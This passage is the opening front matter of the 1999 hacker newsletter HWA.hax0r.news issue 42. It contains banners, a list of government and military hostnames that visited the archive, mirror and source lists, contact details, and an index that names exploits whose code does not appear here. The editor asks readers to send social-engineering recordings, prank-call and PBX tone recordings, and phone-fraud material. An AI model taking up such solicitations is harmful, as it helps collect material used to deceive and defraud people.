Copy Link
Add to Bookmark
Report
hwa-hn42
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 42 Volume 1 1999 *Nov 14th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
* This issue covers Nov 7th to Nov 14th and is our 1st anniversary edition!
==========================================================================
(¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
(¯`·._(¯`·._( © BIRTHDAY ISSUE NOV13th 1999 © )_.·´¯)_.·´¯)
(¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
_ _
/ |___| |_
| / __| __|
_ | \__ \ |_
__ _ _ __ _ __ (_)_ |_|___/\__|_ ___ __ _ _ __ _ _
/ _` | '_ \| '_ \| \ \ / / _ \ '__/ __|/ _` | '__| | | |
| (_| | | | | | | | |\ V / __/ | \__ \ (_| | | | |_| |
\__,_|_| |_|_| |_|_| \_/ \___|_| |___/\__,_|_| \__, |
___ __| (_) |_(_) ___ _ __ |___/
/ _ \/ _` | | __| |/ _ \| '_ \
| __/ (_| | | |_| | (_) | | | |
\___|\__,_|_|\__|_|\___/|_| |_|
"ABUSUS NON TOLLIT USUM"
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
http://www.csoft.net/~hwa
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
The Hacker's Ethic
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
New mirror sites
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #42
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
**************************************************************************
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on from the zine and around ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
(¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
(¯`·._(¯`·._( © BIRTHDAY ISSUE NOV13th 1999 © )_.·´¯)_.·´¯)
(¯`·._(¯`·._(¯`·._(¯`·._( © © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
The first video played on MTV was 'Video Killed The Radio Star'
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Who is Chris Buckley and why was he busted?......................
04.0 .. rpc.nfsd2 exploit for Linux .....................................
05.0 .. MSADC/RDS script v2 by rain forest puppy.........................
06.0 .. CMAIL Server 2.3 SP2 Exploit for Windows98/Penguin Security......
07.0 .. FuseMail Version 2.7 Exploit for Windows98/Shadow Penguin Security
08.0 .. NetcPlus SmartServer3 Exploit for Windows98/Shadow Penguin Security
09.0 .. FTP Serv-U Version 2.5 Exploit for Windows98/Shadow Penguin Security
10.0 .. Tiny FTPD Version 0.51 Exploit for Windows98/Shadow Penguin Security
11.0 .. ZOM-MAIL 1.09 Exploit/Shadow Penguin Security....................
12.0 .. AL-Mail32 Version 1.10 Exploit for Windows98/Shadow Penguin Security
13.0 .. YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit..........
14.0 .. Skyfull Mail Server Version 1.1.4 Exploit/Shadow Penguin Security.
15.0 .. Exploit Translation Server Version1.00/Shadow Penguin Security...
16.0 .. Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp)
17.0 .. Security Focus Newsletters #14 and 15............................
18.0 .. First RealJukebox Now RealPlayer ................................
19.0 .. New Difficult To Kill Macro Virus Found .........................
20.0 .. Do the Laws of War Apply in Cyberspace? .........................
21.0 .. cDc Has New Trojan Plans ........................................
22.0 .. India Set To Vote on 'CyberLaw' Bill ............................
23.0 .. Public Workshop to Discuss Web Site Profiling To Be Held ........
24.0 .. Naval Station Upgrades Web Security .............................
25.0 .. Sony Reveals Addresses of 2.5 Million Subscribers ...............
26.0 .. TrustE to Rethink Charter .......................................
27.0 .. Russians Exploited SIPRnet Gateways .............................
28.0 .. FBI Director Calls For International Cooperation on Online Crime
29.0 .. Lebanon Outlaws Voice Over IP ...................................
30.0 .. Bond Fans Could Not Wait?........................................
31.0 .. Masquerade Attack Discovered for Outlook ........................
32.0 .. Feds May Create Database to Steal Privacy .......................
33.0 .. CMU Invades Students Computers ..................................
34.0 .. New Privacy Alerting Software ...................................
35.0 .. CypherPunks to Host Echelon Discussion ..........................
36.0 .. Cable And Wireless Optus Drops Legal Action Against Surfers .....
37.0 .. BubbleBoy Virus Uses HTML .......................................
38.0 .. DVD Decrypters Sued - DeCSS Labeled A 'Good Thing'...............
39.0 .. Class Action Suits Brought Against RealNetworks .................
40.0 .. IETF Rejects Internet Wiretapping Proposals .....................
41.0 .. John Vranesevich, AntiOnline, Slashdot and the Synthesis ........
42.0 .. Strange Corporate Hacking Saga ..................................
43.0 .. Bubbleboy breaks out of lab - found on net ......................
44.0 .. 'Fun Love' Warning Issued .......................................
45.0 .. Simple nomad to speak at toorcon.................................
46.0 .. Distributed Attempt to Break 56bit CS-Cipher ....................
47.0 .. CallNet Admits to Security Blunder ..............................
48.0 .. Singapore Pair Sentenced After Posting Passwords ................
49.0 .. Singapore Agencies to Investigate Defacement of Government Web Site
50.0 .. BSA Targets IRC For Piracy ......................................
51.0 .. Law Firm Sued Over Possible Cyber Attack ........................
52.0 .. New E-Zine Issues Released ......................................
53.0 .. 'Fixed' version of the new ADM-BIND exploit......................
54.0 .. Current snapshot of the CYBERARMY lists. Proxies, etc............
During an average lifetime a man will spend 3550 hours removing 8.4 meters of stubble
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Websites;
sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
